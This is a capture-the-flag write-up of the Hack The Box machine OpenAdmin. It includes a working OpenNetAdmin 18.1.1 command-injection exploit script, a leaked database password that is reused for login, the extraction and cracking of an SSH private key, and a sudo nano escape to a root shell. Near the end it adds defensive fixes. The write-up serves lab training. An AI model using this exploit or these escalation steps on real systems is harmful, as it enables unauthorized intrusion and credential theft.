Hack The Box — OpenAdmin 10.10.10.171 Writeup

Fahmi J
6 min read · May 1, 2020

OpenAdmin is an easy-difficulty box from Hack The Box that starts off by finding an instance of OpenNetAdmin. This application is known to be vulnerable to remote code execution, which can be leveraged to gain a foothold on the system and then obtain reused database credentials. The first user has access to a web application that is currently hosted internally. That internal web application has a logic flaw that allows me to obtain the SSH key of the second user. The second user is allowed to run the nano editor with sudo privileges, which can be abused to gain root access.

Reconnaissance

I’ll start with port scanning using nmap.

Nmap

nmap -sV -sC -oA OpenAdmin 10.10.10.171
  • -sC, to scan with the default scripts
  • -sV, to detect service versions
  • -oA, to save the output in all three formats (.nmap, .gnmap and .xml) under the base name OpenAdmin

Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

From the scan results, nmap found two open ports:

  • An SSH service running on port 22
  • An HTTP service running on port 80

Also from the scan above, the machine is likely running Ubuntu.

SSH usually requires valid credentials and there is no obvious exploit for it yet, so further enumeration is needed.

Enumeration

TCP 80 — Website

Visiting port 80 only displays the default Apache page.

Directory Brute Force

Performing a directory brute force against the web server using dirb discovered a few hidden directories.

$ dirb http://openadmin.htb/ /usr/share/wordlists/dirb/common.txt -r
... <snip> ...
---- Scanning URL: http://openadmin.htb/ ----
==> DIRECTORY: http://openadmin.htb/artwork/
+ http://openadmin.htb/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://openadmin.htb/music/
+ http://openadmin.htb/server-status (CODE:200|SIZE:278)
... <snip> ...

:: http://openadmin.htb/artwork/

:: http://openadmin.htb/music/

The /music home page provides a login menu that points to http://openadmin.htb/ona.

:: /ona

Visiting /ona/ brings me to an instance of OpenNetAdmin, an application for managing network-related resources.

OK, going from a music page to networking doesn’t make much sense to me.

There’s a warning on the page complaining that the version currently in use (v18.1.1) is not the latest release.

Foothold

Exploit PoC for OpenNetAdmin 18.1.1

Based on the version above, a quick search on exploit-db shows that this version of OpenNetAdmin is vulnerable to remote code execution. The exploit PoC source code is as follows:

OpenRCE.sh

#!/bin/bash
URL="${1}"
while true; do
    echo -n "$ "; read cmd
    curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

The exploit PoC is saved as OpenRCE.sh and below is the issued command to run the exploit.

./OpenRCE.sh http://openadmin.htb/ona/

Shell as jimmy

Upon enumerating the current working directory, a database credential is found in ./local/config/database_settings.inc.php.

$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

There are two non-root users with a login shell and a home directory under /home.

$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

The password from the database config is reused by user jimmy, but the user flag cannot be found in jimmy’s home directory.

The find command is issued to search for files owned by user jimmy.

find / -type f -user jimmy 2>/dev/null

It successfully reveals that user jimmy has access to files in /var/www/internal/.

Based on the Apache config, /var/www/internal is hosted locally on port 52846 and, through mpm_itk, runs as user joanna.

$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Code review — Improper Redirection

After inspecting the main.php source code from /var/www/internal/, a logic flaw was found on the first line.

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

This line of code has an improper redirect.

<?php session_start(); 
if (!isset ($_SESSION['username'])) {
header("Location: /index.php");
};
...<snip>...
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
...<snip>...

The code above checks for a session, but the check is incomplete: header() only sets the Location response header and does not stop the script, and no die() or exit() follows it, so the rest of the code below is executed as well.

Therefore, a plain curl request (curl does not follow redirects unless -L is given) ignores the Location header, and the response body still renders joanna’s SSH key.

jimmy@openadmin:~$ curl -s http://127.0.0.1:52846/main.php
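The same session check with the termination step that main.php lacks, as an added example that is not the box's code: header() only queues the Location header, so the script must stop itself after issuing the redirect.

```php
<?php
// Added example, not the box's main.php: the same session check with the
// termination step that main.php lacks. header() only queues a Location
// header; PHP keeps executing the script unless it stops itself, so any
// output produced after the redirect is sent to a client that does not
// follow redirects (curl without -L, or any client reading the raw body).
session_start();

if (!isset($_SESSION['username'])) {
    header('Location: /index.php', true, 302);
    exit; // nothing below this line is sent to an unauthenticated client
}

// Only reached with a valid session: render the protected content.
// (Placeholder output; the original script shells out to read a private key here.)
echo '<pre>' . htmlspecialchars('protected content for ' . $_SESSION['username']) . '</pre>';
```

To verify the fix, `curl -s -o /dev/null -w '%{http_code} %{size_download}\n' http://127.0.0.1:52846/main.php` should now report a 302 with a zero-length body instead of a 302 followed by the key.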

Cracking SSH Password

The private key is encrypted with a passphrase. John the Ripper can be used to crack an encrypted SSH key, but first it must be converted to hash form, which can be done with ssh2john.py.

python ssh2john.py joanna_rsa > joanna_rsa.hash

Once the hash is copied to my Windows machine, cracking is attempted using John the Ripper.

Shell as joanna

I successfully logged in as user joanna via SSH using the cracked password.

ssh -i joanna_rsa joanna@10.10.10.171

The user flag is obtained here.

Privilege Escalation

Abusing sudo nano

User joanna has sudo privileges on /bin/nano.

On Linux boxes, whenever you have a valid user password, always check sudo -l!

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

A quick way to read the root flag is by issuing the command below,

joanna@openadmin:~$ sudo /bin/nano /opt/priv

and then hitting CTRL+R (read file) to open /root/root.txt, which reveals the root flag.

From the GTFOBins page, escalation from user joanna to a root shell is as follows:

joanna@openadmin:~$ sudo /bin/nano /opt/priv # Opening nano as root
^R^X # CTRL+R (read/open file), CTRL+X(execute command)
reset; sh 1>&0 2>&0 # Escape from nano
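As an added configuration example (not the box's own /etc/sudoers), the rule as found on the box beside a safer form using sudoedit: sudoedit copies the target file to a temporary location, runs the editor as the invoking user, and writes the result back as root only after the editor exits, so nano's read-file and execute-command functions no longer run with root privileges.

```sudoers
# Added example, not the box's /etc/sudoers.

# Weak: the editor process itself runs as root, so everything nano can do
# (read any file with ^R, run a command with ^X) is done as root.
joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv

# Safer: sudoedit copies /opt/priv to a temporary file, launches the user's
# editor as joanna, and copies the edited file back as root afterwards.
joanna ALL=(ALL) NOPASSWD: sudoedit /opt/priv
```

With the safer rule, `sudo -l` lists `sudoedit /opt/priv` and the user still gets to edit that one file, but the editor has no privileges to escape from.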
